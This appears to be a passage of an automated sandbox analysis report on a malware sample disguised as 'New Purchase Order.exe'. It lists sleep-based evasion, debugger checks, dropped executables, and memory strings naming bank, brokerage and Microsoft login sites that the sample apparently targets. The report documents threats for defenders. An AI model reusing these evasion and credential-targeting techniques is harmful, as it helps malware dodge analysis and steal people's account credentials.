            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5804Thread sleep time: -1844674407370954s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5344Thread sleep count: 107 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2268Thread sleep time: -1844674407370954s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4788Thread sleep time: -1844674407370954s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4620Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exe TID: 3136Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exe TID: 2800Thread sleep count: 2313 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exe TID: 2800Thread sleep time: -4626000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exe TID: 2800Thread sleep count: 7660 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exe TID: 2800Thread sleep time: -15320000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exe TID: 5952Thread sleep time: -40000s >= -30000s
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\setupugc.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\setupugc.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_00CFC520 FindFirstFileW,FindNextFileW,FindClose,17_2_00CFC520
            Source: C:\Users\user\Desktop\New Purchase Order.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: 3h8t0-08.17.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
            Source: 3h8t0-08.17.drBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
            Source: 3h8t0-08.17.drBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
            Source: 3h8t0-08.17.drBinary or memory string: discord.comVMware20,11696487552f
            Source: 3h8t0-08.17.drBinary or memory string: bankofamerica.comVMware20,11696487552x
            Source: 3h8t0-08.17.drBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
            Source: 3h8t0-08.17.drBinary or memory string: ms.portal.azure.comVMware20,11696487552
            Source: 3h8t0-08.17.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
            Source: 3h8t0-08.17.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
            Source: 3h8t0-08.17.drBinary or memory string: global block list test formVMware20,11696487552
            Source: 3h8t0-08.17.drBinary or memory string: tasks.office.comVMware20,11696487552o
            Source: 3h8t0-08.17.drBinary or memory string: AMC password management pageVMware20,11696487552
            Source: setupugc.exe, 00000011.00000002.3376763818.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000016.00000002.2690741859.0000027DB97DD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: 3h8t0-08.17.drBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
            Source: 3h8t0-08.17.drBinary or memory string: interactivebrokers.comVMware20,11696487552
            Source: 3h8t0-08.17.drBinary or memory string: dev.azure.comVMware20,11696487552j
            Source: 3h8t0-08.17.drBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
            Source: SguBfrlSDIFxPr.exe, 00000014.00000002.3377666225.00000000009DF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll5
            Source: 3h8t0-08.17.drBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
            Source: 3h8t0-08.17.drBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
            Source: 3h8t0-08.17.drBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
            Source: 3h8t0-08.17.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
            Source: 3h8t0-08.17.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
            Source: 3h8t0-08.17.drBinary or memory string: outlook.office365.comVMware20,11696487552t
            Source: 3h8t0-08.17.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
            Source: 3h8t0-08.17.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
            Source: 3h8t0-08.17.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
            Source: 3h8t0-08.17.drBinary or memory string: outlook.office.comVMware20,11696487552s
            Source: 3h8t0-08.17.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
            Source: 3h8t0-08.17.drBinary or memory string: turbotax.intuit.comVMware20,11696487552t
            Source: 3h8t0-08.17.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
            Source: 3h8t0-08.17.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
            Source: 3h8t0-08.17.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0181096E rdtsc 9_2_0181096E
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_00417733 LdrLoadDll,9_2_00417733
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0188C188 mov eax, dword ptr fs:[00000030h]9_2_0188C188
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0188C188 mov eax, dword ptr fs:[00000030h]9_2_0188C188
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01810185 mov eax, dword ptr fs:[00000030h]9_2_01810185
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01874180 mov eax, dword ptr fs:[00000030h]9_2_01874180
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01874180 mov eax, dword ptr fs:[00000030h]9_2_01874180
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0185019F mov eax, dword ptr fs:[00000030h]9_2_0185019F
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0185019F mov eax, dword ptr fs:[00000030h]9_2_0185019F
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0185019F mov eax, dword ptr fs:[00000030h]9_2_0185019F
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0185019F mov eax, dword ptr fs:[00000030h]9_2_0185019F
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017D6154 mov eax, dword ptr fs:[00000030h]9_2_017D6154
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017D6154 mov eax, dword ptr fs:[00000030h]9_2_017D6154
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017CC156 mov eax, dword ptr fs:[00000030h]9_2_017CC156
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_018961C3 mov eax, dword ptr fs:[00000030h]9_2_018961C3
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_018961C3 mov eax, dword ptr fs:[00000030h]9_2_018961C3
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0184E1D0 mov eax, dword ptr fs:[00000030h]9_2_0184E1D0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0184E1D0 mov eax, dword ptr fs:[00000030h]9_2_0184E1D0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0184E1D0 mov ecx, dword ptr fs:[00000030h]9_2_0184E1D0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0184E1D0 mov eax, dword ptr fs:[00000030h]9_2_0184E1D0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0184E1D0 mov eax, dword ptr fs:[00000030h]9_2_0184E1D0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_018A61E5 mov eax, dword ptr fs:[00000030h]9_2_018A61E5
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_018001F8 mov eax, dword ptr fs:[00000030h]9_2_018001F8
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0187E10E mov eax, dword ptr fs:[00000030h]9_2_0187E10E
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0187E10E mov ecx, dword ptr fs:[00000030h]9_2_0187E10E
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0187E10E mov eax, dword ptr fs:[00000030h]9_2_0187E10E
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0187E10E mov eax, dword ptr fs:[00000030h]9_2_0187E10E
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0187E10E mov ecx, dword ptr fs:[00000030h]9_2_0187E10E
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0187E10E mov eax, dword ptr fs:[00000030h]9_2_0187E10E
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0187E10E mov eax, dword ptr fs:[00000030h]9_2_0187E10E
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0187E10E mov ecx, dword ptr fs:[00000030h]9_2_0187E10E
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0187E10E mov eax, dword ptr fs:[00000030h]9_2_0187E10E
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0187E10E mov ecx, dword ptr fs:[00000030h]9_2_0187E10E
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01890115 mov eax, dword ptr fs:[00000030h]9_2_01890115
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0187A118 mov ecx, dword ptr fs:[00000030h]9_2_0187A118
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0187A118 mov eax, dword ptr fs:[00000030h]9_2_0187A118
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0187A118 mov eax, dword ptr fs:[00000030h]9_2_0187A118
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0187A118 mov eax, dword ptr fs:[00000030h]9_2_0187A118
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01800124 mov eax, dword ptr fs:[00000030h]9_2_01800124
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01864144 mov eax, dword ptr fs:[00000030h]9_2_01864144
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01864144 mov eax, dword ptr fs:[00000030h]9_2_01864144
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01864144 mov ecx, dword ptr fs:[00000030h]9_2_01864144
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01864144 mov eax, dword ptr fs:[00000030h]9_2_01864144
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01864144 mov eax, dword ptr fs:[00000030h]9_2_01864144
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01868158 mov eax, dword ptr fs:[00000030h]9_2_01868158
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017CA197 mov eax, dword ptr fs:[00000030h]9_2_017CA197
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017CA197 mov eax, dword ptr fs:[00000030h]9_2_017CA197
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017CA197 mov eax, dword ptr fs:[00000030h]9_2_017CA197
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_018A4164 mov eax, dword ptr fs:[00000030h]9_2_018A4164
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_018A4164 mov eax, dword ptr fs:[00000030h]9_2_018A4164
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017FC073 mov eax, dword ptr fs:[00000030h]9_2_017FC073
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017D2050 mov eax, dword ptr fs:[00000030h]9_2_017D2050
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_018680A8 mov eax, dword ptr fs:[00000030h]9_2_018680A8
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_018960B8 mov eax, dword ptr fs:[00000030h]9_2_018960B8
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_018960B8 mov ecx, dword ptr fs:[00000030h]9_2_018960B8
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_018520DE mov eax, dword ptr fs:[00000030h]9_2_018520DE
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017CA020 mov eax, dword ptr fs:[00000030h]9_2_017CA020
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017CC020 mov eax, dword ptr fs:[00000030h]9_2_017CC020
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_018560E0 mov eax, dword ptr fs:[00000030h]9_2_018560E0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017EE016 mov eax, dword ptr fs:[00000030h]9_2_017EE016
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017EE016 mov eax, dword ptr fs:[00000030h]9_2_017EE016
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017EE016 mov eax, dword ptr fs:[00000030h]9_2_017EE016
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017EE016 mov eax, dword ptr fs:[00000030h]9_2_017EE016
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_018120F0 mov ecx, dword ptr fs:[00000030h]9_2_018120F0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01854000 mov ecx, dword ptr fs:[00000030h]9_2_01854000
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01872000 mov eax, dword ptr fs:[00000030h]9_2_01872000
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01872000 mov eax, dword ptr fs:[00000030h]9_2_01872000
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01872000 mov eax, dword ptr fs:[00000030h]9_2_01872000
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01872000 mov eax, dword ptr fs:[00000030h]9_2_01872000
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01872000 mov eax, dword ptr fs:[00000030h]9_2_01872000
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01872000 mov eax, dword ptr fs:[00000030h]9_2_01872000
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01872000 mov eax, dword ptr fs:[00000030h]9_2_01872000
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01872000 mov eax, dword ptr fs:[00000030h]9_2_01872000
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017CC0F0 mov eax, dword ptr fs:[00000030h]9_2_017CC0F0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017D80E9 mov eax, dword ptr fs:[00000030h]9_2_017D80E9
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017CA0E3 mov ecx, dword ptr fs:[00000030h]9_2_017CA0E3
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01866030 mov eax, dword ptr fs:[00000030h]9_2_01866030
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01856050 mov eax, dword ptr fs:[00000030h]9_2_01856050
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017C80A0 mov eax, dword ptr fs:[00000030h]9_2_017C80A0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017D208A mov eax, dword ptr fs:[00000030h]9_2_017D208A
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0188C3CD mov eax, dword ptr fs:[00000030h]9_2_0188C3CD
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_018563C0 mov eax, dword ptr fs:[00000030h]9_2_018563C0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_018743D4 mov eax, dword ptr fs:[00000030h]9_2_018743D4
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_018743D4 mov eax, dword ptr fs:[00000030h]9_2_018743D4
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0187E3DB mov eax, dword ptr fs:[00000030h]9_2_0187E3DB
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0187E3DB mov eax, dword ptr fs:[00000030h]9_2_0187E3DB
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0187E3DB mov ecx, dword ptr fs:[00000030h]9_2_0187E3DB
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0187E3DB mov eax, dword ptr fs:[00000030h]9_2_0187E3DB
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017CC310 mov ecx, dword ptr fs:[00000030h]9_2_017CC310
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017F0310 mov ecx, dword ptr fs:[00000030h]9_2_017F0310
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_018063FF mov eax, dword ptr fs:[00000030h]9_2_018063FF
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0180A30B mov eax, dword ptr fs:[00000030h]9_2_0180A30B
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0180A30B mov eax, dword ptr fs:[00000030h]9_2_0180A30B
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0180A30B mov eax, dword ptr fs:[00000030h]9_2_0180A30B
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017EE3F0 mov eax, dword ptr fs:[00000030h]9_2_017EE3F0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017EE3F0 mov eax, dword ptr fs:[00000030h]9_2_017EE3F0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017EE3F0 mov eax, dword ptr fs:[00000030h]9_2_017EE3F0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017E03E9 mov eax, dword ptr fs:[00000030h]9_2_017E03E9
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017E03E9 mov eax, dword ptr fs:[00000030h]9_2_017E03E9
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017E03E9 mov eax, dword ptr fs:[00000030h]9_2_017E03E9
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017E03E9 mov eax, dword ptr fs:[00000030h]9_2_017E03E9
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017E03E9 mov eax, dword ptr fs:[00000030h]9_2_017E03E9
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017E03E9 mov eax, dword ptr fs:[00000030h]9_2_017E03E9
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017E03E9 mov eax, dword ptr fs:[00000030h]9_2_017E03E9
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017E03E9 mov eax, dword ptr fs:[00000030h]9_2_017E03E9
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_018A8324 mov eax, dword ptr fs:[00000030h]9_2_018A8324
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_018A8324 mov ecx, dword ptr fs:[00000030h]9_2_018A8324
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_018A8324 mov eax, dword ptr fs:[00000030h]9_2_018A8324
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_018A8324 mov eax, dword ptr fs:[00000030h]9_2_018A8324
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017DA3C0 mov eax, dword ptr fs:[00000030h]9_2_017DA3C0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017DA3C0 mov eax, dword ptr fs:[00000030h]9_2_017DA3C0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017DA3C0 mov eax, dword ptr fs:[00000030h]9_2_017DA3C0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017DA3C0 mov eax, dword ptr fs:[00000030h]9_2_017DA3C0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017DA3C0 mov eax, dword ptr fs:[00000030h]9_2_017DA3C0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017DA3C0 mov eax, dword ptr fs:[00000030h]9_2_017DA3C0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017D83C0 mov eax, dword ptr fs:[00000030h]9_2_017D83C0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017D83C0 mov eax, dword ptr fs:[00000030h]9_2_017D83C0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017D83C0 mov eax, dword ptr fs:[00000030h]9_2_017D83C0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017D83C0 mov eax, dword ptr fs:[00000030h]9_2_017D83C0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_018A634F mov eax, dword ptr fs:[00000030h]9_2_018A634F
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01852349 mov eax, dword ptr fs:[00000030h]9_2_01852349
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01852349 mov eax, dword ptr fs:[00000030h]9_2_01852349
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01852349 mov eax, dword ptr fs:[00000030h]9_2_01852349
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01852349 mov eax, dword ptr fs:[00000030h]9_2_01852349
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01852349 mov eax, dword ptr fs:[00000030h]9_2_01852349
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01852349 mov eax, dword ptr fs:[00000030h]9_2_01852349
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01852349 mov eax, dword ptr fs:[00000030h]9_2_01852349
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01852349 mov eax, dword ptr fs:[00000030h]9_2_01852349
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01852349 mov eax, dword ptr fs:[00000030h]9_2_01852349
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01852349 mov eax, dword ptr fs:[00000030h]9_2_01852349
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01852349 mov eax, dword ptr fs:[00000030h]9_2_01852349
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01852349 mov eax, dword ptr fs:[00000030h]9_2_01852349
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01852349 mov eax, dword ptr fs:[00000030h]9_2_01852349
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01852349 mov eax, dword ptr fs:[00000030h]9_2_01852349
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01852349 mov eax, dword ptr fs:[00000030h]9_2_01852349
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01878350 mov ecx, dword ptr fs:[00000030h]9_2_01878350
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0185035C mov eax, dword ptr fs:[00000030h]9_2_0185035C
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0185035C mov eax, dword ptr fs:[00000030h]9_2_0185035C
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0185035C mov eax, dword ptr fs:[00000030h]9_2_0185035C
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0185035C mov ecx, dword ptr fs:[00000030h]9_2_0185035C
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0185035C mov eax, dword ptr fs:[00000030h]9_2_0185035C
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0185035C mov eax, dword ptr fs:[00000030h]9_2_0185035C
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0189A352 mov eax, dword ptr fs:[00000030h]9_2_0189A352
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017C8397 mov eax, dword ptr fs:[00000030h]9_2_017C8397
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017C8397 mov eax, dword ptr fs:[00000030h]9_2_017C8397
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017C8397 mov eax, dword ptr fs:[00000030h]9_2_017C8397
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017F438F mov eax, dword ptr fs:[00000030h]9_2_017F438F
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017F438F mov eax, dword ptr fs:[00000030h]9_2_017F438F
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017CE388 mov eax, dword ptr fs:[00000030h]9_2_017CE388
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017CE388 mov eax, dword ptr fs:[00000030h]9_2_017CE388
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017CE388 mov eax, dword ptr fs:[00000030h]9_2_017CE388
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0187437C mov eax, dword ptr fs:[00000030h]9_2_0187437C
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0180E284 mov eax, dword ptr fs:[00000030h]9_2_0180E284
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0180E284 mov eax, dword ptr fs:[00000030h]9_2_0180E284
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01850283 mov eax, dword ptr fs:[00000030h]9_2_01850283
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01850283 mov eax, dword ptr fs:[00000030h]9_2_01850283
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01850283 mov eax, dword ptr fs:[00000030h]9_2_01850283
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017C826B mov eax, dword ptr fs:[00000030h]9_2_017C826B
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017D4260 mov eax, dword ptr fs:[00000030h]9_2_017D4260
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017D4260 mov eax, dword ptr fs:[00000030h]9_2_017D4260
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017D4260 mov eax, dword ptr fs:[00000030h]9_2_017D4260
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017D6259 mov eax, dword ptr fs:[00000030h]9_2_017D6259
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_018662A0 mov eax, dword ptr fs:[00000030h]9_2_018662A0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_018662A0 mov ecx, dword ptr fs:[00000030h]9_2_018662A0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_018662A0 mov eax, dword ptr fs:[00000030h]9_2_018662A0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_018662A0 mov eax, dword ptr fs:[00000030h]9_2_018662A0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_018662A0 mov eax, dword ptr fs:[00000030h]9_2_018662A0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_018662A0 mov eax, dword ptr fs:[00000030h]9_2_018662A0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017CA250 mov eax, dword ptr fs:[00000030h]9_2_017CA250
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017C823B mov eax, dword ptr fs:[00000030h]9_2_017C823B
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_018A62D6 mov eax, dword ptr fs:[00000030h]9_2_018A62D6
